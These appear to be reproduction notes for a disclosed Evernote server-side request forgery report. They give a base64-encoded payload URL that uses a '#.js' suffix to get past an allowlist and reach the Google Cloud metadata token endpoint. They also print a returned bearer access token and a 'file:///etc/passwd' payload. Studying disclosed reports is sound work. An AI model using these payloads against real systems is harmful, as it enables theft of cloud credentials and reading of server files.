https://hackerone.com/reports/1189367
https://web.archive.org/web/20220331091630/https://blog.neolex.dev/13/
Steps to reproduce
L2Y2Y2RkNGJkZmE0YzFiODZmNDQxYzdjMjlmMDcyZTUxMWRkMzQ1MDEuY3Nz
gives you /f6cdd4bdfa4c1b86f441c7c29f072e511dd34501.css
f6cdd4bdfa4c1b86f441c7c29f072e511dd34501.css
is reflected in the response attacker though of SSRFhttp://169.254.169.254
by encoding to base64 but it didn’t worked after few hit and trial attacker learned about whitelisting which only allow file ending with .css
or .js
He used the following payload
https://www.evernote.com/ro/aHR0cDovL21ldGFkYXRhLmdvb2dsZS5pbnRlcm5hbC9jb21wdXRlTWV0YWRhdGEvdjFiZXRhMS9pbnN0YW5jZS9zZXJ2aWNlLWFjY291bnRzL2RlZmF1bHQvdG9rZW4jLmpz/-1430533899.js
Which get’s decoded to
http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/token#.js
{"access_token":"ya29.c.Ko4B_gd-ROPkMva4XDYr-U2r-G_KMv8hy6ViP1f3kotzmmW9aiK8Zphl0QSOEBgqTSiBYtV-Yuy6-innnpf-0IQEgmBqWU_wT2ZYmGjceeyNB79WxYgDnBrOegozvYYOenisR-xBnkDX_AzAFGsDaToQ87QNHNjpK8CLeoFb3jZkO4D7mn532qv7NYuD9CIH0w","expires_in":2298,"token_type":"Bearer"};
file:///etc/passwd#.js